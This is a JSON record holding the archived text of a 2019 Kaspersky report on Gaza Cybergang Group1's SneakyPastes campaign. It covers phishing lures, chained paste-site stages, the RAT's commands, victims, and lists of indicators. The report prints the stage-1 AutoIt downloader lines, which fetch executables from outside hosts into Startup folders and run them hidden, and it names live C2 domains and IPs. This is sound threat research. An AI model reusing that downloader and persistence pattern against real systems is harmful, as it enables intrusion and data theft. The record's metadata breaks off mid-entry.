{ "id": "8f88702d-1839-4ee2-bdc0-ae07c13d538c", "created_at": "2026-04-06T01:29:38.781494Z", "updated_at": "2026-04-10T03:38:03.319632Z", "deleted_at": null, "sha1_hash": "5ae5837e687a4928cd5c11a4fe1dedea327c898d", "title": "Gaza Cybergang Group1, operation SneakyPastes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5343727, "plain_text": "Gaza Cybergang Group1, operation SneakyPastes\r\nBy GReAT\r\nPublished: 2019-04-10 · Archived: 2026-04-06 00:57:52 UTC\r\nAPT reports\r\nAPT reports\r\n10 Apr 2019\r\n 13 minute read\r\n GReAT\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 1 of 21\n\nGaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East\r\nNorth Africa) region, especially the Palestinian Territories.\r\nThe confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber\r\ncommunity. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware\r\nand infection stages, although there was an alignment in its goals…\r\nDuring our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in\r\nthe MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups\r\noperating within Gaza Cybergang:\r\nGaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;\r\nGaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;\r\nGaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.\r\nThe groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial\r\ninfection. The three attack groups were identified sharing victims. For example, Group1 would deploy a script to infect a\r\nspecific victim with malware belonging to Group2, or similarly between Group2 and Group3.\r\nMore information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:\r\nGroup2: ‘The Desert Falcons targeted attacks‘\r\nGroup3: ‘Operation Parliament, who is doing what?‘\r\nAdditional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information,\r\nplease contact: intelreports@kaspersky.com\r\nSummary\r\nGaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the\r\nuse of paste sites (with the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT) or\r\nmultiple, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection\r\nand extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government\r\nentities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.\r\nIn this post, we’ll take a closer look at Gaza Cybergang Group1, including:\r\n1. 1 Updated 2018/2019 tactics, techniques and procedures\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 2 of 21\n\n2. 2 Victimology of the group between Jan 2018 and Jan 2019\r\n3. 3 Historical checkpoints and politicized graphical decoys in Appendix I\r\n4. 4 Full list of indicators of compromise in Appendix II\r\nTechnical analysis\r\nThrough our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1\r\ntargeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an\r\nopen-source type of toolset, which conducts widespread attacks, but is nevertheless focused on Palestinian political\r\nproblems. The attackers rely a lot on chained attack stages to evade quick detection and hide the communication\r\ninfrastructure.\r\nAfter an analysis of the samples, and through collaboration efforts with law enforcement agencies, we were able to uncover\r\nthe full cycle of the intrusions that spread across the majority of the cyber kill chain, including but not limited to the toolset\r\nused, TTPs, infrastructure, action on objectives and the victimology. These efforts have led to the takedown of a large\r\nportion of the related infrastructure.\r\nIn this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then\r\npastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different\r\nmalware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server.\r\nWe have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final\r\nstage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload,\r\netc. It then creates random long string folder names in temp directories to host the collected files per category before\r\ncompressing, encrypting and uploading to the C2 server.\r\nSpreading\r\nThe threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in\r\nspecific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used\r\nin the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in\r\npolitics.\r\nIn order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery\r\nmedium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes\r\nthe first stage was attached to the email itself.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 3 of 21\n\nIf the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he\r\nwill execute afterwards.\r\nIntrusion life-cycle analysis\r\nThe diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different\r\nsamples may use different methods to infect (i.e. invoke PowerShell, VBS, .NET app downloader, etc.), they generally stick\r\nto the same scenario of a persistent RAT that steals data and uploads it to the C2 server despite the different hard-coded\r\ndomains.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 4 of 21\n\nStage 1 sample file: 3amadi_hamas.zip\r\nMD5: e686ffa90b2bfb567547f1c0dad1ae0b\r\nType: Compressed container\r\nexe. محضر اجتماع العمادي مع هنية رٔييس حماس امس االحد :name lure/file Child\r\nChild file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342\r\nThis sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a\r\ncompiled AutoIt script and which embeds some interesting functions (listed in the table below). The executable attempts to\r\ndownload a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then\r\ninvokes the first downloaded file – Picture2.exe.\r\nEmbedded functions\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nSleep, 15000\r\nUrlDownloadToFile, https://upload.cat/0037e96c45ac2098?\r\ndownload_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac,\r\n%AppData%\\Microsoft\\Windows\\Picture2.exe\r\n6240c31d9a82dc70a38f78d44a1ee239\r\nsleep,4000\r\nUrlDownloadToFile, https://upload.cat/089590f6d72aeaef?\r\ndownload_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78,\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 5 of 21\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Picture4.exe\r\ncab62bb5f00fe15683c6af760c8e8f7e\r\nsleep,4000\r\nUrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\\Thr0om.jpg\r\nc90f9c600169cbedbeb23316ea61e214\r\nsleep,4000\r\nUrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?\r\ndownload_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2,\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\333Po333.exe\r\n8c5f8d1ab7baa9a0764cd5650ddecd8e\r\nsleep,5000\r\nUrlDownloadToFile, https://upload.cat/9a08bc13e683d330?\r\ndownload_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078,\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFrom444444.exe\r\n2a3aa1d207030d8c7dc3cfc9c2d9f9f1\r\nsleep,5000\r\nUrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?\r\ndownload_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5,\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFrom355353.exe\r\nbd83269da75741303a19b826c5f9627d\r\nsleep,5000\r\nRunWait %AppData%\\Microsoft\\Windows\\Picture2.exe ,, hide\r\nsleep,2000\r\nAfter analyzing the files downloaded from the above first stage malware, it was clear that the threat actor wanted to achieve\r\nstable persistence on the victim machine, and also used more than one technique to exfiltrate data. The analyzed samples had\r\na lot of similarities in terms of the code used and especially in the persistence techniques.\r\nMalware features\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 6 of 21\n\nAll the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of\r\npersistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known\r\nsoftware with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, had a multitude\r\nof functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search\r\ndirectories, etc. The threat actor’s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was\r\nobvious from the victim data that was collected – it was to search for specific file extensions such as PDF, DOC, DOCX,\r\nXLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by\r\nvictim ID (bot ID – long MD5 string), encrypted and uploaded to the C2.\r\nCommand Brief Description\r\nKEYWORD\r\nDownloads encrypted strings found on the /Feed server page that represents specific keywords of\r\ninterest which, if found, then compresses/encrypts using Winrar appending “Keyword” in the file\r\nname and uploading to the C2 using a POST command at the path “/FeedBack.php”.\r\nFeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory\r\nand stores the metadata in the mssql database for later reference.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 7 of 21\n\nKEY\r\nTrigger to upload all data gathered to the C2 using a POST command at the path “/log.php”.\r\nLog.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores\r\nthe metadata in the mssql database for later reference.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 8 of 21\n\nKEYS Deletes the file named by tempPath + “ky” file so as not to upload anything.\r\nREUPLOAD Re-uploads recent data to the C2 server using POST at the path “/FeedBack.php”.\r\nRESTARTME Restarts the RAT application process.\r\nBLOCK Creates a file in the Temp path and names it “Block~” + PCID to kill the RAT.\r\nSCREEN\r\nTakes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to\r\nthe C2 server using POST at the path “/FeedBack.php”.\r\nLAN\r\nCreates a file in the Temp path and names it “LA” + PCID to possibly spread through LAN. Note:\r\nthis seems to refer to an unloaded feature/module of the RAT that is not currently in use.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 9 of 21\n\nLANS Deletes the file created by the LAN command to reverse the effect.\r\nUSB\r\nCreates a file in the Temp path and names it “us” + PCID then invokes another program module\r\nnamed Remo.test to identify removable drives.\r\nUSBS Deletes the file created by the USB command to reverse the effect.\r\nHD\r\nCreates a file in the Temp path and names it “hd” + PCID then invokes another program module\r\nnamed hd.test1 to identify logical drives.\r\nHDS Deletes the file created by the HD command to reverse the effect.\r\nSHUTDOWN Shuts down the system using cmd /s /t 0\r\nRESTART Reboots the system using cmd /r /t 0\r\nPROCANDSOFT\r\nLists all active processes and all installed software and uploads the results to the C2 server using a\r\nPOST command at the “/log.php”.\r\nDEL-TEMP Deletes all files in the “AppData/Local/Temp” path.\r\nRAR\r\nCreates RAR files per logical drive containing data with timestamps for the past 7 days, then\r\nuploads RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nRARM\r\nCreates RAR files per logical drive containing data with timestamps for the past 30 days, then\r\nuploads RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nRARW\r\nCreates RAR files per logical drive containing data with timestamps for the past 7 days, then\r\nuploads RAR to the C2 server using a POST command at the path “/FeedBack.php”.\r\nKILL Kills system processes.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 10 of 21\n\nInfrastructure\r\nIn 2018, the threat actor mostly relied on a single C2 server (192.169.7.250) and rotated a multitude of domain names over a\r\nperiod of time. However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github,\r\nPastebin, dev-point.co, a.pomf.cat, and upload.cat.\r\nThe phishing email infrastructure though relied on disposable email providers such as bit-degree.com, mail4gmail.com,\r\ncareless-whisper.com and others.\r\nVictimology\r\nBased on the analyzed metrics, the victims were spread across 39 countries and reached 240+ unique victims. The\r\nPalestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the below table.\r\nThe most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties\r\nor personnel, healthcare and banking.\r\nCountry\r\nNumber of\r\nvictims\r\nPalestinian Territories 110\r\nJordan 25\r\nIsrael 17\r\nLebanon 11\r\nSaudi Arabia 9\r\nSyria 9\r\nEgypt 7\r\nUAE 6\r\nSenegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain,\r\nSri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy,\r\nKuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA\r\n\u003c 5\r\nConclusions\r\nWhile Gaza Cybergang Group1 described in this post looks like a low sophistication group, with limited infrastructure and\r\nattack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high\r\nmalleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.\r\nGaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks\r\nare now divided into three groups with different levels of sophistication and different levels of targeting. We expect the\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 11 of 21\n\ndamage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the\r\ncomplicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and\r\nprocedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and\r\nOperation Parliament (Group3) will be presented in future publications.\r\nAppendix I – Main historical checkpoints and politicized decoys Gaza Cybergang Group1\r\n2016-2019\r\nMD5 Hash\r\nFirst\r\nseen\r\nFilename/Decoy Translation/Explanation C2 server\r\nB3a472f81f800b32fe6595f44c9bf63b\r\nFeb\r\n2016\r\nبرقية وزارة الخارجية\r\nالرتكية لسيادتكم\r\nحول موضوع\r\nexe.هام\r\nTranslation: Letter for\r\nyou from the Turkish\r\nMinistry of Foreign\r\nAffairs on Russian\r\nmilitary operations in\r\nSyria\r\nen.gameoolines.com\r\n(185.117.72.190)\r\nDf3f3ad279ca98f947214ffb3c91c514\r\ne8a29c7a6f6c0140152ca8a01e336b37\r\nMarch\r\n2016\r\npresident abu\r\nmazen meetings\r\nwith khaled\r\nmeshaal.lha\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\nf9bcc21fbb40247167c8c85ed6ef56e3\r\nMarch\r\n2016\r\nlha.دراسة\r\nDl.topgamse.com\r\n(45.63.97.44)\r\nD9dbb65a42ffe0575f0e99f7498a593e\r\nApril\r\n2016\r\nبرقية الخارجية\r\nالسعودية لسيادتكم\r\nيرجي اإلطالع –\r\nexe.مهم\r\nTranslation: Saudi\r\nForeign Affairs telegram\r\nfor you, please see –\r\nimportant.exe\r\nen.gameoolines.com\r\n(185.117.72.190)\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 12 of 21\n\n221EEF8511169C0496BBC79F96E84A4A\r\nApril\r\n2016\r\nتقرير السعودية\r\nوالمعلومات المتوفر\r\n– ونستكمل عند\r\nexe.التوفر\r\nTranslation: Report on\r\nSaudi available\r\ninformation, to be\r\nupdated with new info\r\nupon availability\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\n62DF4BC3738BE5AD4892200A1DC6B59A\r\nInside: 55d33d9da371fdfe7871f2479621444a\r\nMay\r\n2016\r\nمعلومات عن هجوم\r\nمحتمل من الحوثيني\r\nعلى مواقع سعودية –\r\nexe.خاص\r\nTranslation: Information\r\non possible attack by\r\nHouthis on Saudi sites –\r\nprivate\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\n838696872F924D28B08AAAA67388202E\r\nMay\r\n2016\r\nعاجل المخابرات\r\nexe.المصرية\r\nTranslation: Urgent\r\nEgyptian Intelligence\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\ne8be9843c372d280a506ac260567bf91\r\nMay\r\n2016\r\nبرقية وزارة الخارجية\r\nexe.السعودية\r\nTranslation: Saudi\r\nForeign Affairs\r\ntelegram.exe\r\nMessage on the 34th\r\nGCC for Interior\r\nMinisters.\r\nWiknet.wikaba.com\r\n(104.200.67.190)\r\nWiknet.mooo.com\r\n55d33d9da371fdfe7871f2479621444a\r\nMay\r\n2016\r\nنموذج ترشيج الدورة\r\nrar. الخاصة\r\nTranslation: Form for\r\nprivate training selection\r\nApplication for a certain\r\nlegal training program for\r\njudges in the UAE\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\ne782610bf209e81ecc42ca94b9388580 July\r\n2016\r\nتمرعاجل – مؤ\r\nexe.ايران\r\nTranslation: Urgent – Iran\r\nconference\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 13 of 21\n\n5db18ab35d29d44dda109f49d1b99f38\r\nJune\r\n2017\r\nפרצת פרטיות\r\nבכרום מאפשרת\r\nלאתרים להקליט\r\nאתכם ללא\r\nexe.ידיעתכם\r\nTranslation: A privacy\r\nbreach in Chrome allows\r\nsites to record you\r\nwithout your knowledge\r\nWiknet.wikaba.com\r\n(104.200.67.190)\r\nwiknet.mooo.com\r\nDae24e4d1dfcdd98f63f7de861d95182\r\nJune\r\n2017\r\nمراسالت العتيبة..\r\nوثائق\r\nexe.ومعلومات\r\nTranslation: Al Otaiba\r\ncorrespondence.\r\nDocuments and\r\ninformation\r\nExplanation: Yousef Al\r\nOtaiba is the current\r\nUnited Arab Emirates\r\nambassador to the United\r\nStates and Minister of\r\nState. The decoy\r\ndiscusses leaks that were\r\nreported in 2017 of his\r\nemails.\r\nWiknet.wikaba.com\r\n(104.200.67.190)\r\nwiknet.mooo.com\r\n2358dbb85a29167fa66ee6bf1a7271cd\r\nApril\r\n2018\r\nكتاب وزارة الخارجية\r\nاإلماراتية\r\nexe.لسيادتكم\r\nTranslation: Book of the\r\nUAE MOFA for you.\r\nExplanation: Document\r\nthat looks as if it comes\r\nfrom the UAE MOFA\r\ndiscussing a political\r\nmeeting between GCC\r\ncountries and the EU in\r\nBelgium\r\ndw.downloadtesting.c\r\n(185.117.75.105)\r\n10dfa690662b9c6db805b95500fc753d\r\nSept\r\n2018\r\nمحضر اجتماع على\r\nالهاتف بني رئيس\r\nالمكتب السيايس\r\nلحركة حماس\r\nاسماعيل هنية\r\nورئيس المخابرات\r\nexe.المصرية\r\nTranslation: Minutes of a\r\nphone call between the\r\nhead of the political\r\nbureau of Hamas Ismail\r\nHaniya and the head of\r\nEgyptian intelligence\r\nUpload.cat (download\r\nsite)\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 14 of 21\n\n6b5946e326488a8c8da3aaec2cb6e70f\r\nSept\r\n2018\r\nExplanation: Document\r\ndiscusses a radio talk by\r\nKhalid ‘Abd al-Majid,\r\nhead of a breakaway\r\nfaction of the Palestinian\r\nPopular Struggle Front, a\r\nminor left-wing group\r\nwithin the Palestinian\r\nLiberation Organization.\r\nHe talks about an\r\nagreement between al-Nusra and ISIS militants\r\nto leave the Palestinian\r\nYarmouk camp in Syria.\r\nWiknet.wikaba.com\r\n(192.169.7.250)\r\nWiknet.mooo.com\r\n342a4d93df060289b2d8362461875905\r\nOct\r\n2018\r\nتسريب من داخل\r\nالقنصلية السعودية\r\nحول مقتل جمال\r\nexe.خاشقجي\r\nTranslation: Leak from\r\nthe Saudi consulate on\r\nthe death of Jamal\r\nKhashoggi\r\nTime-loss.dns05.com\r\n(192.169.7.250)\r\nc9cae9026ee2034626e4a43cfdd8b192\r\nJan\r\n2019\r\nمحضر اجتماع السفري\r\nالقطري العمادي مع\r\nالوفد المصري في رام\r\nexe. الله\r\nTranslation: Minutes of\r\nmeeting of Qatari\r\nAmbassador Emadi with\r\nthe Egyptian delegation\r\nin Ramallah\r\nTime-loss.dns05.com\r\n(192.169.7.250)\r\ndji-msi.2waky.com\r\nAppendix II – Indicators of compromise\r\nType IoC Description\r\nRAR md5 E686FFA90B2BFB567547F1C0DAD1AE0B Stage 1 executable / lure\r\nRAR md5 CE5AA4956D4D0D66BED361DDD7DB1A3B Stage 1 executable / lure\r\nRAR md5 4F34902C9F458008BAE26BFA5C1C00DA Stage 1 executable / lure\r\nRAR md5 535F8EA65969A84A68CEAF88778C6176 Stage 1 executable / lure\r\nRAR md5 E8A29C7A6F6C0140152CA8A01E336B37 Stage 1 executable / lure\r\nRAR md5 E782610BF209E81ECC42CA94B9388580 Stage 1 executable / lure\r\nRAR md5 F9BCC21FBB40247167C8C85ED6EF56E3 Stage 1 executable / lure\r\nEXE md5 33369AFD3042326E964139CABA1888D3\r\nStage 2 executable (19182-exe) that invokes\r\nPastebin chain\r\nEXE md5 2AD88AE20D8F4CB2C74CAE890FEB337A\r\nStage 2 executable (1918-exe) that invokes Pastebin\r\nchain\r\nEXE md5 55929FF3E67D79F9E1E205EBD38BC494\r\nStage 2 executable (21918-exe) that invokes\r\nPastebin chain\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 15 of 21\n\nEXE md5 DA486DF0D8E03A220808C3BFA5B40D06\r\nStage 2 executable (Adope-exe) that invokes\r\nPastebin chain\r\nEXE md5 C7F98F890B21C556D16BFF55E33C33AB\r\nStage 2 executable (Application-exe) that invokes\r\nPastebin chain\r\nEXE md5 FAFCC11AF99ACF1B70997BC4BF36CFC0\r\nStage 2 executable (bind-exe) which is a backdoored\r\nTile Slide Puzzle computer game that invokes\r\nPastebin chain – code freely available\r\nEXE md5 28CACBF64141F50426830B385AB1BE4C\r\nDell-cmd – Command string to Delete User Temp\r\ndirectory\r\nEXE md5 F30C00E87C7EE27033DC0AC421F3B4F8\r\nStage 2 executable (D-exe) that invokes Pastebin\r\nchain\r\nEXE md5 51A59AEC24B5046EC4615728A5B52802\r\nStage 2 executable (Dv-exe) that invokes Pastebin\r\nchain\r\nEXE md5 98BDE191AE6E2F7D8D4166C4B21A27D2 Office-vbs – github.gist lolpoke/system1\r\nEXE md5 9E152A6ADCB57D44284AF3B6FD0C94C2\r\nStage 2 executable (p0w-exe) that invokes Pastebin\r\nchain\r\nEXE md5 CAB62BB5F00FE15683C6AF760C8E8F7E wPic4-exe – RAT executable similar to Pictures4.exe\r\nEXE md5 192DD65864119017AA307BE3363E31BB\r\nPowe1-exe – executable that uses scheduled tasks to\r\nexecute VB scripts\r\nEXE md5 71E462260F45C5E621A5F5C9A5724844\r\nWinPeggy4-exe – backdoored Peggy Bees computer\r\ngame – source code available on Microsoft site\r\nEXE md5 AB98768D2440E72F42FCD274806F8D2A WinPeggy-exe – another variant of WinPeggy4.exe\r\nEXE md5 DAACE673B1F4DFE8A4D3D021C5190483\r\nWord-hta – VBS code to invoke PowerShell from\r\ngithub.gist..0lol0/system1.ps1\r\nEXE md5 1529AE427FE4EB2D9B4C3073B2AA9E10\r\nWord-vbs – VBS code to invoke PowerShell from\r\ngithub.gist lolpoke/system1.ps1\r\nPowershell\r\nmd5\r\nCCD324DF0F606469FCA3D1C6FFA951AD\r\nSystem1.ps1 – PowerShell script that invoke a\r\nbinary in memory that uses NETSH commands to\r\nallow programs, then execute a Trojan downloaded\r\nfrom myftp[.]biz\r\nPowershell\r\nmd5\r\nD153FF52AE717D8CF26BEF57BDB7867D\r\nInstall.ps1 – PowerShell script that invoke a cobalt\r\nstrike beacon\r\nEXE md5 AD1C91BF5E7D1F0AAF2E4EFB8FB79ADE\r\nStage 2 executable (res-vbs) that invokes Pastebin\r\nchain\r\nEXE md5 EE3AD5B06DBC6CCA7FDC9096697A9B4A\r\nRe-vbs – VBS script that uses Pastebin data to create\r\nscheduled task and run JScript to invoke RAT\r\nEXE md5 805CA34E94DA9615C13D8AF48307FB07\r\nFolder.exe – another RAT variant based on Pastebin\r\nchain\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 16 of 21\n\nEXE md5 F330703C07DDD19226A48DEBA4E8AA08\r\nStage 2 executable (shell-exe) that invokes Pastebin\r\nchain\r\nEXE md5 CFD2178185C40C9E30AADA7E3F667D4B Another RAT variant based on Pastebin chain\r\nEXE md5 C2EE081EC3ADEF4AFACAB1F326EE50FF\r\n2poker2.exe – use PowerShell command to invoke\r\nbase64 string from Pastebin and create another RAT\r\nvariant\r\nEXE md5 B3A472F81F800B32FE6595F44C9BF63B Stage 1 executable / lure\r\nEXE md5 DF3F3AD279CA98F947214FFB3C91C514 Stage 1 executable / lure\r\nEXE md5 221EEF8511169C0496BBC79F96E84A4A Stage 1 executable / lure\r\nEXE md5 62DF4BC3738BE5AD4892200A1DC6B59A Stage 1 executable / lure\r\nEXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure\r\nEXE md5 838696872F924D28B08AAAA67388202E Stage 1 executable / lure\r\nEXE md5 E8BE9843C372D280A506AC260567BF91 Stage 1 executable / lure\r\nEXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure\r\nEXE md5 D9DBB65A42FFE0575F0E99F7498A593E Stage 1 executable / lure\r\nEXE md5 5DB18AB35D29D44DDA109F49D1B99F38 Stage 1 executable / lure\r\nEXE md5 DAE24E4D1DFCDD98F63F7DE861D95182 Stage 1 executable / lure\r\nEXE md5 2358DBB85A29167FA66EE6BF1A7271CD Stage 1 executable / lure\r\nEXE md5 10DFA690662B9C6DB805B95500FC753D Stage 1 executable / lure\r\nEXE md5 6B5946E326488A8C8DA3AAEC2CB6E70F Stage 1 executable / lure\r\nEXE md5 342A4D93DF060289B2D8362461875905 Stage 1 executable / lure\r\nEXE md5 C9CAE9026EE2034626E4A43CFDD8B192 Stage 1 executable / lure\r\nNetwork dji-msi.2waky.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork checktest.www1.biz\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork fulltest.yourtrap.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork microsoft10.compress.to\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork mmh.ns02.us\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork ramliktest.mynetav.org\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 17 of 21\n\nNetwork testhoward.mysecondarydns.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork testmace.compress.to\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork time-loss.dns05.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork wiknet.mooo.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork Wiknet.wikaba.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork supports.mefound.com\r\nExternal C2 domain; rotates with the others over\r\ntime\r\nNetwork saso10.myftp.biz\r\nExternal C2 server used by PowerShell scripts to\r\ndownload malware\r\nNetwork 192.169.7.250 External C2 server (most active)\r\nNetwork 104.200.67.190 External C2 server (least active)\r\nNetwork 185.117.72.190 External C2 server (least active)\r\nNetwork 45.63.97.44 External C2 server (least active)\r\nLatest Webinars\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 18 of 21\n\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 19 of 21\n\nReports\r\nKaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang\r\nPanda or Bronze President) APT campaigns, including three variants of a browser data stealer.\r\nKaspersky discloses a 2025 HoneyMyte (aka Mustang Panda or Bronze President) APT campaign, which uses a kernel-mode rootkit to deliver and protect a ToneShell backdoor.\r\nKaspersky GReAT experts analyze the Evasive Panda APT’s infection chain, including shellcode encrypted with DPAPI and\r\nRC5, as well as the MgBot implant.\r\nKaspersky expert describes new malicious tools employed by the Cloud Atlas APT, including implants of their signature\r\nbackdoors VBShower, VBCloud, PowerShower, and CloudAtlas.\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 20 of 21\n\nSource: https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nhttps://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/" ], "report_names": [ "90068" ], "threat_actors": [ { "id": "acae6371-5530-498a-8b99-c2f55652ffd5", "created_at": "2022-10-25T16:07:23.980316Z", "updated_at": "2026-04-10T02:00:04.818728Z", "deleted_at": null, "main_name": "Operation Parliament", "aliases": [], "source_name": "ETDA:Operation Parliament", "tools": [ "Remote CMD/PowerShell terminal" ], "source_id": "ETDA", "reports": null }, { "id": "77b28afd-8187-4917-a453-1d5a279cb5e4", "created_at": "2022-10-25T15:50:23.768278Z", "updated_at": "2026-04-10T02:00:05.266635Z", "deleted_at": null, "main_name": "Inception", "aliases": [ "Inception Framework", "Cloud Atlas" ], "source_name": "MITRE:Inception", "tools": [ "PowerShower", "VBShower", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "3bda9919-b9cd-451c-89e6-c7674f8c6257", 